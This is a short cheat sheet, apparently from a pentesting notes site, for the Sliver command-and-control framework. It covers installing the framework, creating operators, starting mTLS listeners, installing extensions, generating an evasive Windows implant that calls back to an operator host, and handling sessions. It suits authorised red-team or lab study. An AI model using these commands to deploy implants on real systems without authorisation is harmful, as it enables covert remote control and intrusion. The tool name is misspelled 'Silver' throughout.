C2 Servers

Quick Intro

SilverC2

Installation

Download the latest binaries from the releases

mv sliver-client_linux /usr/local/bin/silver-client 
mv sliver-server_linux /usr/local/bin/silver-server

Starting the server

silver-server

Generate an operator

new-operator --name <NAME> --lhost <IP> --lport <PORT>

Enable Multiplayer

multiplayer

Copy the <PROFILE>.cfg to the `silver-client` configurations

cp zAbuQasem_10.10.15.87.cfg ~/.silver-client/configs
# OR
silver-client import ./zAbuQasem_10.10.15.87.cfg

Connect to the server

# In a new terminal
silver-client

Working with Extensions

Listing extensions

armory

Installing all extensions

armory install all

Aliases usage: Make sure to use -- or '' before adding args ..etc

execute -- <COMMAND/OPTION>
execute '' <COMMAND/OPTION>

Starting a listener

mtls --lhost <IP> --lport <PORT> [--persistent]
# http, https -> check help menu

Generate a Payload

generate --mtls <LHOST> --evasion --os=Windows --save=./abuqasem.exe

Working with sessions

  • List sessions

sessions
  • Interacting with a session

use <ID>

Last updated